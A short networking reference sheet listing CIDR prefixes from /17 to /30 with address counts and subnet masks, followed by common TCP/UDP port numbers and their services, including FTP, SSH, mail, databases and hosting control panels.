CIDR /17 32,768 11111111 11111111 10000000 00000000 255.255.128.0

CIDR /18 16,384 11111111 11111111 11000000 00000000 255.255.192.0

CIDR /19 8,192 11111111 11111111 11100000 00000000 255.255.224.0

CIDR /20 4,096 11111111 11111111 11110000 00000000 255.255.240.0

CIDR /21 2,048 11111111 11111111 11111000 00000000 255.255.248.0

CIDR /23 512 11111111 11111111 11111110 00000000 255.255.254.0

C /24 256 11111111 11111111 11111111 00000000 255.255.255.0

CIDR /25 128 11111111 11111111 11111111 10000000 255.255.255.128

CIDR /26 64 11111111 11111111 11111111 11000000 255.255.255.192

CIDR /27 32 11111111 11111111 11111111 11100000 255.255.255.224

CIDR /28 16 11111111 11111111 11111111 11110000 255.255.255.240

CIDR /29 8 11111111 11111111 11111111 11111000 255.255.255.248

CIDR /30 4 11111111 11111111 11111111 11111100 255.255.255.252

21 TCP FTP (File Transfer Protocol)

22 TCP/UDP SSH (ssh,scp copy or sftp)

25 TCP/UDP SMTP (for sending outgoing emails)

43 TCP WHOIS function

53 TCP/UDP DNS Server (Domain name service for DNS requests)

67 UDP DHCP Server

70 TCP Gopher Protocol

79 TCP Finger protocol

110 TCP POP3 (for receiving email)

119 TCP NNTP (Network News Transfer Protocol)

143 TCP/UDP IMAP4 Protocol (for email service)

194 TCP IRC

389 TCP/UDP LDAP (light weight directory access)

636 TCP/UDP LDAP over SSL

443 TCP Secure HTTP over SSL (https)

465 TCP Secure SMTP (email) using SSL

500 UDP IKE

512 TCP r-exec

513 TCP r-login

514 TCP r-services

520 UDP RIP

990 TCP/UDP Secure FTP using SSL

993 TCP Secure IMAP protocol over SSL (for emails)

1433 TCP/UDP Microsoft SQL server port

2082 TCP Cpanel default port

2083 TCP Cpanel over SSL

2086 TCP Cpanel Webhost Manager (default)

2087 TCP Cpanel Webhost Manager (with https)

2095 TCP Cpanel Webmail

2096 TCP Cpanel secure webmail over SSL

3306 TCP/UDP MySQL Database Server

4643 TCP Virtuosso Power Panel

5432 TCP PostgreSQL Database Server

6000 TCP X11 (X-Server in Unix)

8080 TCP HTTP port (alternative one for port 80)

8087 TCP Plesk Control Panel Port (default)

8443 TCP Plesk Server Control Panel over SSL